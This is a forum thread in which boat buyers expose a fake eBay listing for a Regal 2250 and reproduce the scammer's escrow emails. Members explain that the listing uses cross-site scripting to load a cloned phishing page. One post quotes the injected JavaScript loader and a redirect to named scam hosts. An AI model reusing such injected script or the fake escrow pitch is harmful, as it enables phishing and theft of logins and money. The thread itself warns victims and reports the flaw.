Yet another scam auction on ebay

[geardownthreegreens]

Just looking as you do and smelled a rat.

A regal 2250 on ebay item No. 221114101407, like new with 50hrs on clock £9800 of offers

Now i dont know if its just my pc, but when i open the advert, the page seems to get covered with an almost identical page,very strange.

Anyway, thought i'd play with this idiot and ask a couple of questions, to which his replies never once answered any of them.
Here are the emails, rather long sorry !!
What do you reckon guys? bargain or scam


We can use the protection program offered by eBay.The boat will be delivered to your home address.I will pay for the shipping.Standard shipping is usually delivered in 5 business days.You will receive the boat along with the registration document, bill of sale signed and all the original books, full service records and 2 keys.Regarding the money side of things, you will pay to eBay the required amount (£ 9,800), and they will secure it until you get the boat. You will be given a 7 days inspection period during which you can decide whether you keep it or not.If you are satisfied with it, you will confirm that to eBay so they can unblock the funds and send it to me.

In order to move on please send me your full name and complete address.I will post the transaction mentioning the boat details, the price etc on eBay website and confirm you as the buyer.

After the transaction is processed they will send you the invoice explaining the procedure.
Thank you,

On Tue, Aug 28, 2012 at 7:26 AM, Simon Gilder <nismoglider@blueyonder.co.uk> wrote:

On 27/08/2012 21:29, Galvin Crosby wrote:
> Hi
> I intend to use the security provided by eBay, because they have a great exchange program. The transaction will be fully under eBay surveillance, giving us both security and insurance that nothing will go wrong. This way you will actually pay for the boat after reception and inspection, considering that the funds will be held in their trust account and released to me only after you accept and confirm the delivery.Do you think a 7 days inspection period will suffice? Within this time frame you have to decide if you purchase it or not. If you decide against the purchase you will be fully refunded without any added charges to your account. The boat will be returned to me if you reject it upon inspection, but I honestly doubt this will happen.
>
> Thank you
>
>
> On Mon, Aug 27, 2012 at 5:10 PM, Simon Gilder <nismoglider@blueyonder.co.uk> wrote:
>
> On 26/08/2012 16:13, Galvin Crosby wrote:
>
> Hello,
>
> For sale: 2009 Regal 2250
>
> Description:
> Regal 2250 with MPI 5L Mercruiser
> For sale immulate condition Regal cuddy cabin.
> Like new only 50 hours on clock.
>
> Specifications:
> Vessel type: Sports boat Cuddy
> Designer: Regal
> Builder: Regal Marine
> Make: Regal
> Model: 2250
> Year constructed: 2009
> Berths: 2
> No. of engines: 1
> Engine model: MPI Mercruiser
> Engine power: 260 HP
> Engine hours: 50
> Fuel type: Petrol (Gas)
> Length over all: 22' 6"
> Hull material: Glass Fibre
> Hull type: V Shape Fast Trac Hull
> Hull colour: Black
>
>
> The price is £ 9,800 including delivery/handling.
>
> Let me know if it's what you are looking for.
>
> Thank you
>
> Yes very interested. When and where can i view the boat. How would you like payment? Cash?
>
> Si
>
>
So where do we go from here??

 

[yachtorion]

Do not visit that item!

I work in website security.... Based on a quick look it looks like you may have uncovered a serious security flaw in ebay called a Cross Site Scripting flaw (XSS). Somebody has managed to set that item up so that it tricks ebay into loading some javascript code that replaces ebay on screen with an identical copy hosted at a site called fordmotorrs.com.

When you login to send a message etc they harvest your username and password and then use your account to scam you or others. If you've logged in via that page - go back to ebay now via a proper URL and change your password. And then change that password anywhere else you use it - especially PayPal etc.

Best advice if you see something that looks out of place or wrong on the internet is stay away from it. Don't interact with them.

EDIT: I've reported the item/flaw to ebay though looking at google they may already know.

 

[geardownthreegreens]

Hi James

Many thanks for that. There was me thinking it was perhaps my pc, but no, there is certainly something a miss there, and you have just explained it. You obviously know about this type of thing.
Thanks for letting ebay know, i've tried to do the same so hopefully this will get pulled.


Simon

 

[yachtorion]

Hi James

Many thanks for that. There was me thinking it was perhaps my pc, but no, there is certainly something a miss there, and you have just explained it. You obviously know about this type of thing.
Thanks for letting ebay know, i've tried to do the same so hopefully this will get pulled.


Simon

Well done on spotting something was wrong - an awful lot of people don't

 

[volvopaul]

Well done James for your input this site needs someone like you, cheers.

 

[old_salt]

jamesjeffrey Hi Can you please clarify a question if putting the item number in to "my ebay" item search and looking at the page on ebay (not asking any questions to the seller) then have you run any risk. You answer would be very much appreciated.
One thing that got me suspicious was no save it in your search and the link below the price box would not save it ether.

Cheers.

 

[yachtorion]

jamesjeffrey Hi Can you please clarify a question if putting the item number in to "my ebay" item search and looking at the page on ebay (not asking any questions to the seller) then have you run any risk. You answer would be very much appreciated.
Cheers.

There is a small theoretical risk if you were logged in when you did it, but I'd have to look a lot more closely to be sure.

If you are concerned changing your eBay password should mitigate the risk.

The reason for the risk is that sometimes a Cross Site Scripting attack like this one can be used to steal "cookies" from your machine, which eBay uses to identify you. So it might let someone pretend to be you on eBay for a while. Changing your password would invalidate the session cookie which is the most important one, and stop someone from doing this.

Apart from that it's just the general internet advice... run a virus scanner, install windows and browser updates, and if something looks suspicious, avoid.

On this particular item the first giveaway that something was wrong was what the OP spotted - the page loading up twice. If you looked in the URL bar at the top when viewing the item you might see it has replaced ebay with the "fortmotorrs" site.

 

[Bojangles]

Thanks James for explaining how this works.

I think I may have come across a similar one, I had enquired about a searay 240 on boatshop 24, asking the seller to confirm the asking price. I asked as it is listed at £7500 and £15000 in a seperate listing, the same boat appears on a brokers site for over £20K (which is probably about right). The "seller" emailed me to say the price was £7500 and if I was interested, they would list it on ebay so I could have their excellent protection etc. Figured it was a scam but had no idea how it worked up until now.

That listing is still on boatshop 24, should I report this?

 

[old_salt]

Thanks James.
I have now changed my ebay ID.
Many thanks for you help.
May be a post on the in the lounge will help others.
In fact it's an important enough issue to post right across all the forums if not already done.
I have no doubt comments from Brendan will also be helpful.

also Quote:-
If you looked in the URL bar at the top when viewing the item you might see it has replaced ebay with the "fortmotorrs" site.

I did not see any top bar re load,
but I am not going there again anyway.

Thanks again James.

 

[geardownthreegreens]

Thanks James for explaining how this works.

I think I may have come across a similar one, I had enquired about a searay 240 on boatshop 24, asking the seller to confirm the asking price. I asked as it is listed at £7500 and £15000 in a seperate listing, the same boat appears on a brokers site for over £20K (which is probably about right). The "seller" emailed me to say the price was £7500 and if I was interested, they would list it on ebay so I could have their excellent protection etc. Figured it was a scam but had no idea how it worked up until now.

That listing is still on boatshop 24, should I report this?

YES YOU SHOULD.

I'm always spotting these ads on boatsandoutboards and reporting them. Next day generally they have gone. They are easy to spot because they half the price. Email them to get a stupid response where they talk about listing on ebay(as you said) for the protection.
Personally i think you'd have to be a right dumbass to fall for it but i guess people do. Just wish i could get my hands on these people.

The auction by the way on ebay is still running with the cloned page. Why do i bother speaking to ebay!!!!

 

[[2068]]

It's a simple scam, but how on earth do ebay allow script to get into an advert page?

Main page script writes out a redirection script ...

<script type="text/javascript">
var
a = "SRC=";
b="http://ruversbay.com/i/m36.js";
c="</";
d="script";
document.write ("<script type='text/javascript'"+a+b+">"+c+d+">");
</script>


... which then redirects you to the scam site.

window.top.location.href = "http://fordmotorrs.com/itm/Regal-2250-with/221114101407/username/not";

 

[yachtorion]

It's a simple scam, but how on earth do ebay allow script to get into an advert page?

Main page script writes out a redirection script ...

<script type="text/javascript">
var
a = "SRC=";
b="<snip>";
c="</";
d="script";
document.write ("<script type='text/javascript'"+a+b+">"+c+d+">");
</script>


... which then redirects you to the scam site.

window.top.location.href = "<snip>";

This kind of problem is actually pretty common - they presumably have a bug in the code filtering user input when someone added or edits the item and someone has found a way to use that bug to get around the filter.

These flaws (XSS) are on sites all over the internet and happen often enough to have made it into the industry bible, the Open Web Application Security Project (OWASP) Top 10, at number 2 - see https://www.owasp.org/index.php/Top_10_2010-A2

I reported it to the eBay security researcher mailbox - I've had a reply from a human saying their engineers are looking at it.

Though I imagine FlowerPower took proper precautions (using a specialist tool rather than a browser etc) when looking at this... If anyone else is considering going to look I would strongly advise them not to. Right now it just looks like it's designed to try and steal your eBay login or part you with some boat money - but they could easily change it to have a good go at putting a virus/trojan onto your computer and cause a lot more problems for you - especially with the recent security problem found in the Java plugin installed on most people's computers.

If you don't go looking for something "dodgy" then the internet is generally fairly safe... but there are exceptions. Both your average fraudster and also technical security risks like these. If something seems dodgy best to just stay away from it

 

[[2068]]

>>Though I imagine FlowerPower took proper precautions
Bog standard Firefox browser with HTTPFox, but run in a "disposable" virtual machine.

>>especially with the recent security problem found in the Java plugin installed on most people's computers.
I have removed all traces of Java plugins from my office laptop! Simply visiting a dodgy site with the vulnerable plugin can cause all sorts of nasties to be uploaded. I ended up having to reformat and reload the OS on a friends daughters laptop because of this (it was too far gone, too many executables missing, no OS backup :-( )

 

[Capt Popeye]

than you Gilly1 for highlighting this scam on ebay.

thank you James for all the info on this type of Fraud / Scam! much appreciated.

 

[SlimRick]

That particular listing has now been removed.

 

[Bojangles]

YES YOU SHOULD.

I'm always spotting these ads on boatsandoutboards and reporting them. Next day generally they have gone. They are easy to spot because they half the price. Email them to get a stupid response where they talk about listing on ebay(as you said) for the protection.
Personally i think you'd have to be a right dumbass to fall for it but i guess people do. Just wish i could get my hands on these people.

The auction by the way on ebay is still running with the cloned page. Why do i bother speaking to ebay!!!!

Email sent to them but I imagine that a good percentage of these adverts could be bogus. Obviously some people fall for it or these fraudsters wouldn't bother wasting their time posting ads.

 

[Preacherman]

Hi there, forgive jumping in on this as a newbie (I do sail a bit, and a fanatical windsurfer so a ybw cousin maybe?). I saw an eBay ad for a really nice Mercedes and emailed the seller today to ask a bunch of questions. The guy responded quickly and answered most, but importantly didnt answer my question about where he was based, so I got a bit suspicious and googled his name - Galvin Crosby. His sign off to the email was identical to the one the OP had, so it's the same scam, just a different item on eBay.

For my own peace of mind, please can you tell me whether I should still be worried. I've changed my eBay and PayPal passwords tonight - about 2 hours after he emailed me back. Should I change my email password too? My eBay password was different any other passwords I have, but I use my email one for a few shopping sites. I dont really get the full details of the scam, but can he wreak havoc on my pc now or have I headed him off at the pass by changing my eBay password? I did think it a bit weird that when I clicked 'send question to seller' on eBay, I didn't have to log in or give any passwords, but I did have to fill in my email address - hence my question about having to change my email password.

All help gratefully received, as frankly I'm $hitting myself that my whole life is about to be stolen by some ar$hole!

I know it's my first post, but I am genuine